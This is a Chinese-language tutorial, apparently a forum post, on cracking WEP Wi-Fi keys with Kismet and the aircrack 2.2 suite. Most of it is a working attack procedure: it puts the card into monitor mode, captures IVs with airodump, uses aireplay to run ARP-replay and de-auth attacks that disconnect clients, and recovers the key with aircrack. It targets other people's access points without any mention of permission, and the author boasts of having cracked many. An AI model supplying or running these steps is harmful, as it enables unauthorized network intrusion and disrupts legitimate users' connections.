所需硬件:带无线网卡电脑一台
所需软件:Auditor CD、aircrack 2.2
注意事项:
无线网卡
由于各种网卡采用的芯片不同,可能某些功能未能实现。推荐 Prism 2 或 Atheros 芯片。小黑内置的无线网卡通常有两种:Intel 或 IBM。IBM 用的就是 Atheros 芯片。不建议使用 Intel 芯片,因为其设计上的原因,抓包有问题,而且不能顺利发攻击包。如果买 PCMCIA 网卡,推荐 Netgear WAG511。
以下是常见芯片对 aircrack 的支持情况:
|
芯片 |
抓包 |
发攻击包 |
|
HermesI |
支持 |
不支持 |
|
Prism2/3 |
支持 |
支持 |
|
PrismGT |
支持 |
支持 |
|
Atheros |
支持 |
支持 |
|
RTL8180 |
支持 |
支持 |
|
Aironet |
支持 |
不支持 |
|
Ralink |
支持 |
支持 |
|
Centrino b |
部分支持 |
不支持 |
|
Centrino b/g |
支持 |
不支持 |
|
TI (ACX100 / ACX111) |
未知 |
不支持 |
|
Broadcom |
不支持 |
不支持 |
操作平台
原则上可采用所有Linux平台。如果有朋友对Linux系统不熟悉,又不想费时间安装的话,可下载Auditor CD。
Auditor CD是一套网络安全工具,本身带有 Linux 系统,无需安装,直接从CD启动即可。CD上有不少网络安全工具,无线网只是其中之一。本文会以 Auditor CD为例,说明操作步骤,但其他Linux也适用。
下载地址
如果你的芯片是 Intel B/G (IPW2200),请下载
我是下载第一个,大多数都是第一个的...
Aircrack目前版本是2.2。下载地址
下完ISO用NERO刻录到光盘...
启动:在BIOS设置用光盘启动,启动后,启动后,在屏幕左下角有一排图标,类似Windows的快速启动图标。其中Programs类似启动菜单,Command Line就是命令行了。咱们的操作都在命令行完成。如图1所示:
图1
首先是收集情报
就是侦听附近有什么 AP,每个 AP 的信道是什么,MAC 地址是什么,是否 WEP 加密,有什么客户端连接到 AP 上。
侦听的工具有许多。如 Windows 下的 Stumbler,Linux 下的 Kismet 等等。用 GOOGLE 找一下就可以了。
由于 Auditor CD 上已经包含 Kismet,咱就直接用它了。
点击 Programs -> Auditor -> Wireless -> Scanner/Analyzer -> Kismet。
初次运行会让你选一个工作目录。咱就选 /var/tmp (临时目录,相当于 Windows 下的 C:\Temp)。
运行起来后,会自动搜索附近的无线信号。按 h 键看帮助菜单。
按 s 键可以把 AP 按一定条件排序。图2见到的就是按 s 键后的画面。如果想按信道排序就按 c。
图2
只有在排序后,才可以用上下箭头来选择 AP。
选好后,按回车键看详细内容,如图3所示。按翻页键上下翻页,记录如下资料:
1. SSID名称。(隐藏SSID的AP,过一段时间就会被 kismet 发现。所以隐藏 SSID 是没用的)
2. AP的MAC地址。即是画面所见的BSSID。
3. 信道。(Channel)
图3
记录完毕后,按 q 退出。
在 AP 列表状态,选择好 AP 后,按 c 键看有没有连接的客户端。(如果没有客户端,破解方法将会不同,下回分解)。假设有客户端,会见到如图4画面。
图4
记录好客户端的 MAC 地址。如果有多个客户端,把所有的 MAC 地址都记录下来。
记录后,同相按 q 退出。如果要退出 kismet,在 AP 列表窗口中按大写 Q。
做好情报收集后,就可以开始了。
点击命令行图标后,会打开一个终端窗口(相当于DOS窗口)。用 iwconfig 命令可检查网卡是否被系统识别。注意不同的芯片的网卡会有不同的名字。如Prism芯片的网卡叫 wlan、Atheros芯片的网卡叫 ath、Intel芯片的网卡叫 eth等。记下你无线网卡的名字,下面会用到。
如图5所见,芯片名称是 ath0,Atheros芯片(非本人所用)。
图5
Auditor CD 200605版本包含 aircrack 2.1版。推荐从网上下载新的aircrack 2.2版。因为2.2版的功能有相当大的改进。
从下载aircrack 2.2后,拷贝到/var/tmp目录中。然后解压、编译。
对Linux不熟悉的朋友,以下是命令解释。这里是以优盘为例。如果你是直接下载到系统中,那就不用映射优盘了。
cd /var/tmp
转移当前目录到 /var/tmp
mount /dev/uba1 /mnt/uba1
把优盘映射到 /dev/uba1 目录
cp /mnt/uba1/aircrack-2.2.tgz .
把 /dev/uba1 (即优盘)中的aircrack-2.2.tgz到当前目录
tar -zxvf aircrack-2.2.tgz 解压aircrack-2.2.tgz (类似于zip、rar解压)
图6
编译 aircrack
由于 aircrack-2.2.tgz中的是源代码,需要编译后方可执行。
转移到 aircrack 目录:cd aircrack-2.2
编译:make
完成编译后,目录中会增加几个可执行文件:airodump, aireplay 等等。
如果是安装在硬盘中的 Linux 可用 make && make install 命令。编译后会把可执行文件拷贝到 bin 目录中。这样在执行时可省却目录名。运行界面如图7.
图7
或者可以安装更新的版本2.41版。
下载到电脑后,解压缩..记住要用英文的,且不能放在中文目录下,要不在LINUX不能识别.
接着点类似开始的那个键,大概倒数第三个,里面有一个OPEN IN FILE MANAGE 之类的WINDOWS 资源管理器,旁边有一列类似分类的,大概是第三个,那里能找到硬盘,找到你放文件的那个盘,在目录下空白处,点右键,有个ACTION 接着有个类似DOS的窗口,进去后,输入 MAKE ,
以下以 Athero 芯片为例。
命令说明:
iwpriv ath0 mode 2
把a/b/g网卡设置在b模式。0:自动,1:a,2:b,3:g。三频网卡通常要固定在某一模式。
iwconfig ath0 mode monitor channel 6
把网卡设置成侦听模式,侦听信道6(把这个数字改成你所要破解的AP的信道)
ifconfig ath0 up
启动网卡
./airmon.sh
执行当前目录中的airmon.sh脚本。该脚本显示网卡状态、驱动程序、当前模式等,如图8所示。
图8
接着输入 iwpriv ath0(这个就是你无线网卡的代号吧,我的就是这个,不同的话就输入你们自己的) mode 2 每个词之间都是空格一位
接着输入 iwconfig ath0 mode monitor channel 6(输入你要破解的AP信道号)
接着输入 ifconfig ath0 up
接着输入 ./airmon.sh start ath0
我的无线网卡是DWL-G650+A的,我用它破了好多个AP了..
破解原理
破解的原理是:用airodump程序,在短时间内收集足够多的数据。然后用aircrack程序去分收集到的数据,从而找出WEP密钥。
为了能在短时间内收集足够多的数据,可用aireplay程序向AP发出请求,产生数据包。
用通俗的话来说,就是 aireplay不断挑逗AP,让 AP 不停说话。airodump就默默地侦听,收集数据。当收集到足够数据后,运行aircrack,分析收集到的数据,找出WEP KEY。
开始监听
在AIRCRACK 目录下点右键 ACTION 开启命令窗口
输入 ./airodump ath0 file 6 1
其中 ath0 是网卡名。file是文件名(可以是任何名字)。6是指信道6(可忽略)。1是让程序只收集与破解有关的数据。
如果最后一个参数忽略,则程序会收集所有数据,文件尺寸会较大,文件扩展名为.cap。适合于做协议分析等工作。如果最后一个参数是1,则只收集与破解有关的数据,尺寸会较小,文件扩展名为.ivs,只适用于破解。
图9
其中BSSID是AP的MAC地址。STATION是客户端的MAC地址。PWR是信号强度。MB是速率。CH是信道。检查这些数据是否符合之前所记录的资料。
DATA是我们需要截取的数据。这个数字越大,破解越容易成功。aircrack说破解128位WEP大概需要一百万个DATA。但运气好的话,通常10到20万个就足够了。
如果看不到客户端,那表示AP还没有电脑和它连接。那我就还不会拉..呵呵
如果DATA不增长,或增长得很慢。那就需要很长时间才收集到足够多的数据。
这就需要aireplay的帮助,“挑逗”AP产生数据。
图10是两个终端窗口。先运行上面一个,再运行下面一个。
./aireplay -3 -b 00:11:50:19:63:33 -h 00:04:23:71:42:ba ath0
表示采用攻击模式3(ARP攻击)。倾听由 -b 指定的 AP 发给 -h 指定的客户端的ARP包。如果截获,就重播这个包。图中看到已经侦听了305个包,但没有一个是符合条件的ARP包。因此所发送的“重播”包也是0。
ARP包通常只会在客户端刚刚连接到AP的时候产生。因此我们要设法让客户端“掉线”,然后重新连接。第二个终端窗口就是做这个事。
./aireplay -0 5 -a 00:11:50:19:61:33
采用攻击模式0(de-auth)。向 -a 指定的AP发5个de-auth包,让客户端掉线。如果正常的话,你会在airodump窗口看到STATION消失,过一会儿又再出现。表示客户端掉线,又再重新连接。
这时候,第一个窗口应该会截取到ARP包,然后开始“重播”(sent后面的数字不断上升),如果还是没有,多发几个攻击包就好了。
再回到airodump窗口,会看到data数目不断上升。当收集到20万个的时候,可尝试破解。如果不成功,再继续收集。如果执行airodump的时候,指定的文件名已经存在,则新收集的数据会追加在原数据后面。
图10
另开一个终端窗口,用列目录命令查看aircrack-2.2目录。你会看到file.ivs文件尺寸不断增大。如图11所示。
图11
当收集到足够数据后,就可以另开一个窗口,运行aircrack。运行aircrack的时候,不需要停止airodump。aircrack会自动检查数据的更新。
./aircrack file.ivs
file.ivs就是收集到的数据文件。如图12所示。
注意,由于WEP有64位与128位之分。而aircrack是无法从数据中区分这个信息的。因此,可先让aircrack进行64位破解,然后再进行128位破解。
./aircrack -n 64 file.ivs
指示aircrack 进行64位破解。如果省略 -n 参数,则是128位破解。
图13就是大家期待已久的画面。不要问我拿到KEY后怎样用。问网友或GOOGLE吧。
图13
